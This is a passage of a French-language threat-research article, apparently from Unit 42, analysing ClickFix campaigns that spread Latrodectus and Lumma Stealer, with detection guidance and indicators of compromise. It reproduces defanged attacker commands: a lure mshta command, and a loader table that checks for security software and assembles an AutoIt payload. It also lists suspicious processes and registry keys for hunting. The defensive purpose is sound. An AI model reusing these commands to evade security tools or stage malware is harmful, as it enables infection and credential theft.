son apparition \u00e0 la mi-2024, les attaquants ont souvent diffus\u00e9 Latrodectus par le biais d\u2019une cha\u00eene comprenant un fichier JavaScript malveillant t\u00e9l\u00e9chargeant un fichier Microsoft Software Installer (MSI) qui d\u00e9pose Latrodectus. Dans ce cas, le fichier JavaScript ex\u00e9cut\u00e9 (<span style=\"font-family: 'courier new', courier, monospace;\">la.txt<\/span>) r\u00e9cup\u00e8re un fichier MSI sur un serveur distant et l\u2019ex\u00e9cute \u00e0 l\u2019aide de <span style=\"font-family: 'courier new', courier, monospace;\">msiexec.exe<\/span>.<\/p>\n<p>Contrairement aux campagnes pr\u00e9c\u00e9dentes o\u00f9 le t\u00e9l\u00e9chargeur JavaScript \u00e9tait g\u00e9n\u00e9ralement surcharg\u00e9 et obscurci par des commentaires absurdes, cette variante utilise de grandes variables JSON de pacotille qui portent des noms apparemment l\u00e9gitimes, tels que <span style=\"font-family: 'courier new', courier, monospace;\">var_Apple_Palantir38<\/span> et <span style=\"font-family: 'courier new', courier, monospace;\">func_Slack_encryption84<\/span>. La figure\u00a010 compare les techniques d\u2019obscurcissement utilis\u00e9es dans les campagnes pass\u00e9es et r\u00e9centes de Latrodectus.<\/p>\n<figure id=\"attachment_152502\" aria-describedby=\"caption-attachment-152502\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-152502 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-92290-152402-10.png\" alt=\"Deux images c\u00f4te \u00e0 c\u00f4te montrant des scripts de code\u00a0: celle de gauche montre un extrait contenant des variables et des fonctions, tandis que celle de droite pr\u00e9sente un bloc de code avec une boucle et des instructions.\" width=\"1000\" height=\"442\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-92290-152402-10.png 2048w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-92290-152402-10-786x347.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-92290-152402-10-1584x700.png 1584w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-92290-152402-10-768x339.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-92290-152402-10-1536x679.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-152502\" class=\"wp-caption-text\">Figure 10. Comparaison entre les techniques d\u2019obscurcissement r\u00e9centes (\u00e0 gauche) et plus anciennes (\u00e0 droite) utilis\u00e9es dans les droppers Latrodectus.<\/figcaption><\/figure>\n<p>Le payload MSI d\u00e9pose plusieurs fichiers sur le disque de la victime. Il s\u2019agit notamment de <a href=\"https:\/\/www.virustotal.com\/gui\/file\/aef5c150cfe8154ed290b293e30d552cfb9b40b3552369345c7c2f135b63aac4\/relations\" target=\"_blank\" rel=\"noopener\">Latrodectus<\/a>, qui se pr\u00e9sente sous la forme d\u2019un fichier DLL malveillant (<span style=\"font-family: 'courier new', courier, monospace;\">libcef.dll<\/span>) et d\u2019un fichier binaire l\u00e9gitime qui transf\u00e8re le fichier DLL. Ceci est illustr\u00e9 par la figure\u00a011.<\/p>\n<figure id=\"attachment_152513\" aria-describedby=\"caption-attachment-152513\" style=\"width: 745px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-152513 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-96826-152402-11.png\" alt=\"Diagramme de la cha\u00eene d\u2019infection Latrodectus, commen\u00e7ant par un site web l\u00e9gitime compromis et passant par la tactique ClickFix, menant au t\u00e9l\u00e9chargement et \u00e0 l\u2019ex\u00e9cution d\u2019un fichier EXE et d\u2019un code shell malveillant. \" width=\"745\" height=\"450\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-96826-152402-11.png 745w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-96826-152402-11-728x440.png 728w\" sizes=\"(max-width: 745px) 100vw, 745px\" \/><figcaption id=\"caption-attachment-152513\" class=\"wp-caption-text\">Figure 11. La cha\u00eene d\u2019infection Latrodectus.<\/figcaption><\/figure>\n<p>Lorsque le fichier l\u00e9gitime transf\u00e8re le fichier DLL malveillant pour Latrodectus, il s\u2019injecte un code shell.<\/p>\n<p>Dans un article de mai 2025 de <a href=\"https:\/\/github.com\/PaloAltoNetworks\/Unit42-timely-threat-intel\/blob\/main\/2025-05-16-IOCs-on-recent-ClickFix-activity.txt\" target=\"_blank\" rel=\"noopener\">Timely Threat Intelligence,<\/a> nous avons analys\u00e9 une campagne Latrodectus similaire, dans laquelle Lumma Stealer servait de payload final pour la cha\u00eene d\u2019attaque compl\u00e8te.<\/p>\n<h3><a id=\"post-152402-_heading=h.n5lev55av0t9\"><\/a>Campagne de typosquattage Lumma Stealer<\/h3>\n<p>Les attaquants qui diffusent Lumma Stealer ont commenc\u00e9 \u00e0 utiliser la technique d\u2019infection ClickFix <a href=\"https:\/\/www.esentire.com\/security-advisories\/lumma-stealer-clickfix-distribution\" target=\"_blank\" rel=\"noopener\">\u00e0 la fin de l\u2019ann\u00e9e 2024<\/a>. Nous avons constat\u00e9 une augmentation des tentatives d\u2019infection par ClickFix pour Lumma Stealer pas plus tard qu\u2019en avril\u00a02025. Au cours des derni\u00e8res campagnes, les attaquants distribuant Lumma Stealer ont touch\u00e9 un large \u00e9ventail de secteurs, dont les suivants\u00a0:<\/p>\n<ul>\n<li>Automobile<\/li>\n<li>\u00c9nergie<\/li>\n<li>IT<\/li>\n<li>Logiciel<\/li>\n<\/ul>\n<p>Notre enqu\u00eate sur l\u2019une de ces campagnes ClickFix a r\u00e9v\u00e9l\u00e9 que les cibles sont invit\u00e9es \u00e0 copier une commande MSHTA unique avec la structure suivante\u00a0: <span style=\"font-family: 'courier new', courier, monospace;\">mshta xxxx[.]co\/xxxxxx =+\\xxx.<\/span><\/p>\n<p>Les attaquants attribuent \u00e0 chaque cible une cha\u00eene d\u2019identification sp\u00e9cifique, qu\u2019elle peut utiliser pour recevoir le payload une fois. Cependant, les URI v\u00e9rifi\u00e9s par nos chercheurs ne d\u00e9livraient plus les payloads apr\u00e8s l\u2019infection.<\/p>\n<p>Lors de l\u2019ex\u00e9cution du script ClickFix, le script redirige l\u2019utilisateur vers une version <a href=\"https:\/\/unit42.paloaltonetworks.com\/cybersquatting\/\" target=\"_blank\" rel=\"noopener\">typosquatt\u00e9e<\/a> des domaines IP Logger <span style=\"font-family: 'courier new', courier, monospace;\">iplogger[.]org<\/span> et<span style=\"font-family: 'courier new', courier, monospace;\"> iplogger[.]com<\/span>. IP Logger est un service de raccourcissement d\u2019URL et de suivi d\u2019adresses\u00a0IP qui cr\u00e9e des liens pour enregistrer des informations sur les visiteurs, notamment\u00a0:<\/p>\n<ul>\n<li>Adresses IP<\/li>\n<li>G\u00e9olocalisation<\/li>\n<li>D\u00e9tails de l\u2019appareil<\/li>\n<li>Comportement de navigation<\/li>\n<\/ul>\n<p>Le domaine typosquatt\u00e9 contr\u00f4l\u00e9 par les attaquants est <span style=\"font-family: 'courier new', courier, monospace;\">iplogger[.]co<\/span>, et la page de ce domaine est d\u00e9guis\u00e9e en un service connu et l\u00e9gitime.<\/p>\n<p>Dans tous les cas de la campagne, nous avons observ\u00e9 que la commande MSHTA t\u00e9l\u00e9chargeait un script PowerShell cod\u00e9, qui d\u00e9clenchait une infection par Lumma Stealer. La figure\u00a012 illustre l\u2019ensemble de la cha\u00eene d\u2019infection.<\/p>\n<figure id=\"attachment_152524\" aria-describedby=\"caption-attachment-152524\" style=\"width: 2048px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-152524 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-99833-152402-12.png\" alt=\"Infection Lumma Stealer d\u00e9crivant le processus d\u2019une attaque par malware impliquant des entit\u00e9s telles que ClickFix, Encoded PowerShell, Lumma Stealer et diverses fonctions telles que la prise de contact avec le serveur C2 (Command and Control), le d\u00e9veloppement de fichiers ex\u00e9cutables et la d\u00e9tection de produits de s\u00e9curit\u00e9. Le graphique montre les connexions et les actions telles que l\u2019abandon de ressources et l\u2019ex\u00e9cution de commandes tout au long du cycle de vie de l\u2019attaque.\" width=\"2048\" height=\"1366\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-99833-152402-12.png 2048w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-99833-152402-12-660x440.png 660w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-99833-152402-12-1049x700.png 1049w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-99833-152402-12-768x512.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-99833-152402-12-1536x1025.png 1536w\" sizes=\"(max-width: 2048px) 100vw, 2048px\" \/><figcaption id=\"caption-attachment-152524\" class=\"wp-caption-text\">Figure 12. La cha\u00eene d\u2019infection Lumma Stealer.<\/figcaption><\/figure>\n<p>Chaque lien contr\u00f4l\u00e9 par l\u2019attaquant dissimule une commande PowerShell lourdement obscurcie et encod\u00e9e en Base64. \u00c0 l\u2019issue de son ex\u00e9cution, cette commande d\u00e9clenche le t\u00e9l\u00e9chargement et le lancement d\u2019un programme malveillant baptis\u00e9 <span style=\"font-family: 'courier new', courier, monospace;\">PartyContinued.exe<\/span>, servant de passerelle au c\u00e9l\u00e8bre voleur d\u2019informations Lumma Stealer. Cet ex\u00e9cutable est h\u00e9berg\u00e9 \u00e0 l\u2019adresse suivante\u00a0: <span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/pub-&lt;s\u00e9rie de chiffres g\u00e9n\u00e9r\u00e9e dynamiquement&gt;.r2[.]dev<\/span> et est nomm\u00e9 de mani\u00e8re \u00e0 ressembler \u00e0 une URL de d\u00e9veloppeur l\u00e9gitime.<\/p>\n<p>Lorsque <span style=\"font-family: 'courier new', courier, monospace;\">PartyContinued.exe<\/span> est lanc\u00e9, il met en place une nouvelle m\u00e9thode de chargement Lumma qui utilise un langage de script appel\u00e9 <a href=\"https:\/\/www.autoitscript.com\/wiki\/AutoIt_and_Malware\" target=\"_blank\" rel=\"noopener\">AutoIt<\/a>. Cette version de Lumma Stealer est similaire aux versions pr\u00e9c\u00e9dentes, mais elle inclut un nouveau fichier CAB (Microsoft Cabinet Archive) nomm\u00e9 <span style=\"font-family: 'courier new', courier, monospace;\">Boat.pst<\/span>. Ce fichier CAB est int\u00e9gr\u00e9 \u00e0 <span style=\"font-family: 'courier new', courier, monospace;\">PartyContinued.exe<\/span> et contient le reste du contenu utilis\u00e9 pour cr\u00e9er un moteur de script AutoIt3 et un script AutoIt qu\u2019il ex\u00e9cute pour Lumma Stealer.<\/p>\n<p>Le tableau\u00a01 r\u00e9sume les commandes ex\u00e9cut\u00e9es par le chargeur et leur objectif\u00a0:<\/p>\n<table style=\"width: 100%; height: 720px;\">\n<tbody>\n<tr style=\"height: 24px;\">\n<td style=\"text-align: left; height: 24px; width: 44.2105%;\"><strong>Commande<\/strong><\/td>\n<td style=\"text-align: left; height: 24px; width: 37.4089%;\"><strong>Description<\/strong><\/td>\n<td style=\"text-align: left; height: 24px; width: 17.6518%;\"><strong>Objectif<\/strong><\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"text-align: left; height: 72px; width: 44.2105%;\"><span style=\"font-family: 'courier new', courier, monospace;\">tasklist |<\/span><span style=\"font-family: 'courier new', courier, monospace;\"> f<\/span><span style=\"font-family: 'courier new', courier, monospace;\">indstr<\/span><span style=\"font-family: 'courier new', courier, monospace;\"> \/I \"opssvc wrsa\"<\/span><\/td>\n<td style=\"text-align: left; height: 72px; width: 37.4089%;\">Effectue une recherche insensible \u00e0 la casse pour <span style=\"font-family: 'courier new', courier, monospace;\">opssvc<\/span> ou <span style=\"font-family: 'courier new', courier, monospace;\">wrsa<\/span> dans le nom d\u2019un processus en cours d\u2019ex\u00e9cution.<\/td>\n<td style=\"text-align: left; height: 72px; width: 17.6518%;\">D\u00e9tection des logiciels de s\u00e9curit\u00e9 des terminaux<\/td>\n<\/tr>\n<tr style=\"height: 48px;\">\n<td style=\"text-align: left; height: 48px; width: 44.2105%;\"><span style=\"font-family: 'courier new', courier, monospace;\">tasklist | findstr \"bdservicehost SophosHealth AvastUI AVGUI nsWscSvc ekrn\"<\/span><\/td>\n<td style=\"text-align: left; height: 48px; width: 37.4089%;\">Recherche diverses cha\u00eenes de caract\u00e8res dans les processus en cours d\u2019ex\u00e9cution.<\/td>\n<td style=\"text-align: left; height: 48px; width: 17.6518%;\">D\u00e9tection des logiciels de s\u00e9curit\u00e9 des terminaux<\/td>\n<\/tr>\n<tr style=\"height: 48px;\">\n<td style=\"text-align: left; height: 48px; width: 44.2105%;\"><span style=\"font-family: 'courier new', courier, monospace;\">cmd \/c md 386354<\/span><\/td>\n<td style=\"text-align: left; height: 48px; width: 37.4089%;\">Cr\u00e9e un r\u00e9pertoire pour enregistrer le malware sur le disque.<\/td>\n<td style=\"text-align: left; height: 48px; width: 17.6518%;\">D\u00e9finition de l\u2019emplacement pour l\u2019extraction de payloads<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"text-align: left; height: 72px; width: 44.2105%;\"><span style=\"font-family: 'courier new', courier, monospace;\">extrac32 \/Y \/E Boat.pst<\/span><\/td>\n<td style=\"text-align: left; height: 72px; width: 37.4089%;\">Extrait les fichiers du fichier <span style=\"font-family: 'courier new', courier, monospace;\">.cab<\/span> nomm\u00e9 <span style=\"font-family: 'courier new', courier, monospace;\">Boat.pst,<\/span> en \u00e9crasant les fichiers existants (<span style=\"font-family: 'courier new', courier, monospace;\">\/Y<\/span>) et en extrayant tous les fichiers (<span style=\"font-family: 'courier new', courier, monospace;\">\/E<\/span>).<\/td>\n<td style=\"text-align: left; height: 72px; width: 17.6518%;\">Extraction de payloads<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"text-align: left; height: 72px; width: 44.2105%;\"><span style=\"font-family: 'courier new', courier, monospace;\">set \/p =\"MZ\" &gt; 386354\\Slovenia[.]com &lt;nul<\/span><\/td>\n<td style=\"text-align: left; height: 72px; width: 37.4089%;\">Cr\u00e9e un fichier nomm\u00e9 <span style=\"font-family: 'courier new', courier, monospace;\">Slovenia[.]com<\/span> dans le r\u00e9pertoire <span style=\"font-family: 'courier new', courier, monospace;\">386354<\/span> contenant deux\u00a0octets pour les caract\u00e8res <span style=\"font-family: 'courier new', courier, monospace;\">MZ<\/span>.<\/td>\n<td style=\"text-align: left; height: 72px; width: 17.6518%;\">Construction de l\u2019ex\u00e9cuteur AutoIt3<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"text-align: left; height: 72px; width: 44.2105%;\"><span style=\"font-family: 'courier new', courier, monospace;\">findstr \/V \"Tr\" Bell &gt;&gt; 386354\\Slovenia[.]com<\/span><\/td>\n<td style=\"text-align: left; height: 72px; width: 37.4089%;\">Ajoute toutes les lignes du fichier extrait nomm\u00e9 Bell qui ne contiennent pas la cha\u00eene <span style=\"font-family: 'courier new', courier, monospace;\">Tr<\/span> (sensible \u00e0 la casse) au fichier<span style=\"font-family: 'courier new', courier, monospace;\"> Slovenia[.]com<\/span>.<\/td>\n<td style=\"text-align: left; height: 72px; width: 17.6518%;\">Construction de l\u2019ex\u00e9cuteur AutoIt3<\/td>\n<\/tr>\n<tr style=\"height: 96px;\">\n<td style=\"text-align: left; height: 96px; width: 44.2105%;\"><span style=\"font-family: 'courier new', courier, monospace;\">cmd \/c copy \/b 386354\\Slovenia[.]com + Sewing + Monetary + Covered + Health + Loss + Intel + Escape + Tramadol + Apparatus 386354\\Slovenia[.]com<\/span><\/td>\n<td style=\"text-align: left; height: 96px; width: 37.4089%;\">Ajoute d\u2019autres fichiers extraits pour terminer la cr\u00e9ation d\u2019un fichier binaire en utilisant copy <span style=\"font-family: 'courier new', courier, monospace;\">\/b<\/span>. Le r\u00e9sultat est une copie de <span style=\"font-family: 'courier new', courier, monospace;\">AutoIt3.exe<\/span>, renomm\u00e9e pour l\u2019occasion en <span style=\"font-family: 'courier new', courier, monospace;\">Slovenia[.]com.<\/span><\/td>\n<td style=\"text-align: left; height: 96px; width: 17.6518%;\">Construction de l\u2019ex\u00e9cuteur AutoIt3<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"text-align: left; height: 72px; width: 44.2105%;\"><span style=\"font-family: 'courier new', courier, monospace;\">cmd \/c copy \/b ..\\Presently.pst + ..\\Instantly.pst + ..\\Roy.pst + ..\\Tolerance.pst + ..\\Mailto.pst + ..\\Marco.pst + ..\\Mint.pst G<\/span><\/td>\n<td style=\"text-align: left; height: 72px; width: 37.4089%;\">Cr\u00e9e un fichier binaire nomm\u00e9 G que <span style=\"font-family: 'courier new', courier, monospace;\">Slovenia[.]com<\/span> ex\u00e9cute en tant que script compil\u00e9 AutoIt\u00a0v3 (<span style=\"font-family: 'courier new', courier, monospace;\">.a3x<\/span>).<\/td>\n<td style=\"text-align: left; height: 72px; width: 17.6518%;\">Construction du payload de Lumma Stealer (ex\u00e9cution du fichier binaire sous la forme d\u2019un fichier <span style=\"font-family: 'courier new', courier, monospace;\">.a3x<\/span>)<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"text-align: left; height: 72px; width: 44.2105%;\"><span style=\"font-family: 'courier new', courier, monospace;\">start Slovenia[.]com G<\/span><\/td>\n<td style=\"text-align: left; height: 72px; width: 37.4089%;\">Commande pour l\u2019ex\u00e9cuteur AutoIt3 afin d\u2019ex\u00e9cuter le fichier binaire pour Lumma Stealer en tant que fichier<span style=\"font-family: 'courier new', courier, monospace;\"> .a3x<\/span>.<\/td>\n<td style=\"text-align: left; height: 72px; width: 17.6518%;\">Chargement\/ex\u00e9cution de Lumma Stealer<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"text-align: left; height: 72px; width: 44.2105%;\"><span style=\"font-family: 'courier new', courier, monospace;\">choice \/d y \/t 5<\/span><\/td>\n<td style=\"text-align: left; height: 72px; width: 37.4089%;\">Commande permettant de s\u00e9lectionner oui (<span style=\"font-family: 'courier new', courier, monospace;\">y<\/span>) pour l\u2019option par d\u00e9faut (<span style=\"font-family: 'courier new', courier, monospace;\">\/d<\/span>) pour les commandes du fichier .bat apr\u00e8s avoir attendu 5\u00a0secondes (<span style=\"font-family: 'courier new', courier, monospace;\">\/t 5<\/span>).<\/td>\n<td style=\"text-align: left; height: 72px; width: 17.6518%;\">Permet \u00e0 Lumma Stealer de fonctionner sans aucune interaction avec l\u2019utilisateur<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-size: 10pt;\">Tableau\u00a01. Commandes ex\u00e9cut\u00e9es par le chargeur pour Lumma Stealer.<\/span><\/p>\n<p>Comme le montre le tableau, <span style=\"font-family: 'courier new', courier, monospace;\">Slovenia[.]com<\/span> est une copie du moteur de script AutoIt3 (<span style=\"font-family: 'courier new', courier, monospace;\">AutoIt3.exe<\/span>) qui ex\u00e9cute un fichier binaire lanc\u00e9 en tant que script AutoIt (<span style=\"font-family: 'courier new', courier, monospace;\">.a3x<\/span>) nomm\u00e9 G, qui est responsable des \u00e9tapes suivantes de l\u2019attaque. Cette version de Latrodectus collecte des informations sensibles, notamment les mots de passe des navigateurs bas\u00e9s sur Chromium, et tente de les exfiltrer vers un serveur C2 \u00e0 l\u2019adresse <span style=\"font-family: 'courier new', courier, monospace;\">sumeriavgv[.]digital.<\/span><\/p>\n<h2><a id=\"post-152402-_heading=h.y00qjvssn1pg\"><\/a>\u00c0 la poursuite des infections ClickFix<\/h2>\n<p>Les attaques ClickFix laissent souvent des traces facilement d\u00e9tectables, en particulier lorsque les personnes qui consultent ces leurres ne sont pas habitu\u00e9es \u00e0 ouvrir des interfaces d\u2019administration, ce qui les incite \u00e0 coller une cha\u00eene de commande malveillante dans une fen\u00eatre d\u2019ex\u00e9cution.<\/p>\n<h3><a id=\"post-152402-_heading=h.tw6m3041ix1g\"><\/a>Examen des artefacts RunMRU<\/h3>\n<p>Windows conserve une cl\u00e9 de registre qui stocke les derni\u00e8res commandes ex\u00e9cut\u00e9es \u00e0 partir de la fen\u00eatre d\u2019ex\u00e9cution (Win + R), appel\u00e9e <span style=\"font-family: 'courier new', courier, monospace;\">RunMRU\u00a0<\/span>:<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU<\/span><\/p>\n<p>Cette cl\u00e9 de registre enregistre toutes les commandes ex\u00e9cut\u00e9es \u00e0 partir de la fen\u00eatre d\u2019ex\u00e9cution, ce qui permet aux experts d\u2019analyser ces entr\u00e9es \u00e0 la recherche de signes d\u2019utilisation suspecte.<\/p>\n<p>Voici quelques indicateurs cl\u00e9s d\u2019un contenu <span style=\"font-family: 'courier new', courier, monospace;\">RunMRU<\/span> suspect\u00a0:<\/p>\n<ul>\n<li>Contenu obscurci<\/li>\n<li>Mots-cl\u00e9s li\u00e9s au t\u00e9l\u00e9chargement et \u00e0 l\u2019ex\u00e9cution de payloads provenant de domaines inconnus ou suspects<\/li>\n<li>Mots-cl\u00e9s indiquant les appels aux interfaces administratives<\/li>\n<\/ul>\n<p>Ces entr\u00e9es indiquent que quelqu\u2019un a pu d\u00e9clencher manuellement ces commandes, ce qui correspond \u00e0 un flux d\u2019infection par ClickFix.<\/p>\n<h3><a id=\"post-152402-_heading=h.we7jldycuupa\"><\/a>D\u00e9tection de ClickFix : variante Win + X<\/h3>\n<p>Certains attaquants cherchent \u00e0 \u00e9viter d\u2019exposer leur activit\u00e9 dans la cl\u00e9 de registre <span style=\"font-family: 'courier new', courier, monospace;\">RunMRU<\/span>. Ils pr\u00e9sentent \u00e0 la place des instructions pour lancer un terminal pour PowerShell (Windows\u00a011) ou Command Prompt (Windows\u00a010) via <span style=\"font-family: 'courier new', courier, monospace;\">Win+X<\/span>, qui ouvre le menu d\u2019acc\u00e8s rapide. Un <a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\" target=\"_blank\" rel=\"noopener\">rapport de mars 2025<\/a> r\u00e9v\u00e8le que les attaquants qui ont diffus\u00e9 Havoc ont utilis\u00e9 cette variante<span style=\"font-family: 'courier new', courier, monospace;\"> Win+X<\/span> de ClickFix.<\/p>\n<p>Les analystes de menaces peuvent rechercher des signes de cette technique ClickFix via <span style=\"font-family: 'courier new', courier, monospace;\">Win+X<\/span> en analysant la t\u00e9l\u00e9m\u00e9trie des solutions EDR ou les journaux d\u2019\u00e9v\u00e9nements Windows; notamment\u00a0:<\/p>\n<ul>\n<li><strong>\u00c9v\u00e9nement de s\u00e9curit\u00e9 ID\u00a04688 (cr\u00e9ation de processus)\u00a0: <\/strong>Recherchez le fichier <span style=\"font-family: 'courier new', courier, monospace;\">powershell.exe<\/span> g\u00e9n\u00e9r\u00e9 par explorer.exe, en corr\u00e9lation avec l\u2019ID d\u2019\u00e9v\u00e9nement 4663 (acc\u00e8s aux objets) des fichiers du dossier <span style=\"font-family: 'courier new', courier, monospace;\">%LocalAppData%\\NMicrosoft\\NWindows\\NWinX\\N<\/span>.<\/li>\n<li><strong>Mod\u00e8les d\u2019utilisation de shell\u00a0:<\/strong> Les sessions PowerShell avec les privil\u00e8ges \u00e9lev\u00e9s, lanc\u00e9es peu apr\u00e8s une connexion interactive, suivies de connexions r\u00e9seau ou de processus enfants suspects (par exemple, <span style=\"font-family: 'courier new', courier, monospace;\">certutil.exe, mshta.exe et rundll32.exe<\/span>), constituent souvent des signaux d\u2019alerte.<\/li>\n<li><strong>Surveillance du presse-papiers\u00a0:<\/strong> Comme les leurres ClickFix reposent sur le fait que les victimes potentielles collent le contenu malveillant du presse-papiers, nous pouvons \u00e9tablir une corr\u00e9lation entre l\u2019activit\u00e9 de collage et l\u2019ex\u00e9cution de PowerShell peu apr\u00e8s que l\u2019utilisateur a appuy\u00e9 sur <span style=\"font-family: 'courier new', courier, monospace;\">Win+X<\/span>.<\/li>\n<\/ul>\n<h2><a id=\"post-152402-_heading=h.sthxrie5s2xz\"><\/a>Conclusion<\/h2>\n<p>La technique ClickFix repr\u00e9sente une menace grandissante, dont la mise en \u0153uvre \u00e9volue de mani\u00e8re dynamique. Les acteurs de la menace exploitent la technique ClickFix dans des attaques ciblant les organisations, tirant parti des erreurs humaines pour assurer la propagation et la persistance de leurs intrusions.<\/p>\n<p>Cet article a examin\u00e9 trois\u00a0campagnes importantes de ClickFix \u2013 NetSupport RAT, Latrodectus et Lumma Stealer \u2013 qui ne cessent d\u2019\u00e9voluer et d\u2019int\u00e9grer de nouvelles techniques.<\/p>\n<p>Les m\u00e9thodes pratiques pour traquer et d\u00e9tecter les leurres ClickFix consistent notamment \u00e0 analyser la t\u00e9l\u00e9m\u00e9trie des solutions\u00a0EDR ou les journaux d\u2019\u00e9v\u00e9nements Windows \u00e0 la recherche d\u2019\u00e9v\u00e9nements, d\u2019activit\u00e9s et de sch\u00e9mas suspects.<\/p>\n<p>Il est essentiel pour la s\u00e9curit\u00e9 des organisations de s\u2019attaquer de mani\u00e8re proactive \u00e0 cette menace en constante \u00e9volution. \u00c0 cette fin, des efforts doivent \u00eatre d\u00e9ploy\u00e9s pour sensibiliser le personnel \u00e0 la n\u00e9cessit\u00e9 de se m\u00e9fier des leurres ClickFix. Ceci devrait \u00eatre fait tout en mettant en place des mesures de d\u00e9fense et de surveillance fond\u00e9es sur nos recommandations en mati\u00e8re de traque des menaces.<\/p>\n<p>Les clients de Palo\u00a0Alto\u00a0Networks sont mieux prot\u00e9g\u00e9s contre les menaces mentionn\u00e9es ci-dessus gr\u00e2ce aux produits suivants\u00a0:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-wildfire\" target=\"_blank\" rel=\"noopener\">Advanced WildFire<\/a><\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-url-filtering\" target=\"_blank\" rel=\"noopener\">Advanced URL Filtering<\/a> et <a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-dns-security\" target=\"_blank\" rel=\"noopener\">Advanced DNS Security<\/a> d\u00e9tectent les attaques ClickFix, telles que celles \u00e9voqu\u00e9es dans cet article, \u00e0 l\u2019aide de nos crawlers de s\u00e9curit\u00e9 hors ligne en d\u00e9tectant les commandes malveillantes inject\u00e9es dans la m\u00e9moire tampon du presse-papiers par un JavaScript malveillant<\/li>\n<li><a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XDR\" target=\"_blank\" rel=\"noopener\">Cortex XDR<\/a> et <a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XSIAM\" target=\"_blank\" rel=\"noopener\">XSIAM<\/a> bloquent l\u2019ensemble des campagnes et malwares mentionn\u00e9s dans cet article gr\u00e2ce au module Behavioral Threat Protection<\/li>\n<\/ul>\n<p>Si vous pensez que votre entreprise a pu \u00eatre compromise ou si vous faites face \u00e0 une urgence, contactez l\u2019<a href=\"https:\/\/start.paloaltonetworks.com\/contact-unit42.html\" target=\"_blank\" rel=\"noopener\">\u00e9quipe Unit\u00a042 de r\u00e9ponse aux incidents<\/a> ou composez l\u2019un des num\u00e9ros suivants\u00a0:<\/p>\n<ul>\n<li>Am\u00e9rique du Nord\u00a0: Gratuit\u00a0: +1 (866) 486-4842 (866.4.UNIT42)<\/li>\n<li>Royaume-Uni\u00a0: +44\u00a020\u00a03743\u00a03660<\/li>\n<li>Europe et Moyen-Orient\u00a0: +31.20.299.3130<\/li>\n<li>Asie\u00a0: +65.6983.8730<\/li>\n<li>Japon\u00a0: +81\u00a050\u00a01790\u00a00200<\/li>\n<li>Australie\u00a0: +61.2.4062.7950<\/li>\n<li>Inde\u00a0: 00080005045107<\/li>\n<\/ul>\n<p>Palo\u00a0Alto\u00a0Networks a partag\u00e9 ces conclusions avec les autres membres de la Cyber\u00a0Threat\u00a0Alliance (CTA). Les membres de la CTA s\u2019appuient sur ces renseignements pour d\u00e9ployer rapidement des mesures de protection aupr\u00e8s de leurs clients et perturber de mani\u00e8re coordonn\u00e9e les activit\u00e9s des cybercriminels. Cliquez ici pour en savoir plus sur la <a href=\"https:\/\/www.cyberthreatalliance.org\" target=\"_blank\" rel=\"noopener\">Cyber Threat Alliance<\/a>.<\/p>\n<h2><a id=\"post-152402-_heading=h.l9nuxew6eiz5\"><\/a>Indicateurs de compromission<\/h2>\n<p>Hachages SHA256 de l\u2019\u00e9chantillon de Lumma Stealer<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Nom de fichier PartyContinued.exe\u00a0: 2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Nom de fichier Boat.pst (un fichier CAB)\u00a0: 06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7<\/span><\/li>\n<\/ul>\n<p>Domaines de l\u2019\u00e9chantillon de Lumma Stealer<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">iplogger[.]co<\/span><\/li>\n<li><span style=\"font-family: 'courier new', 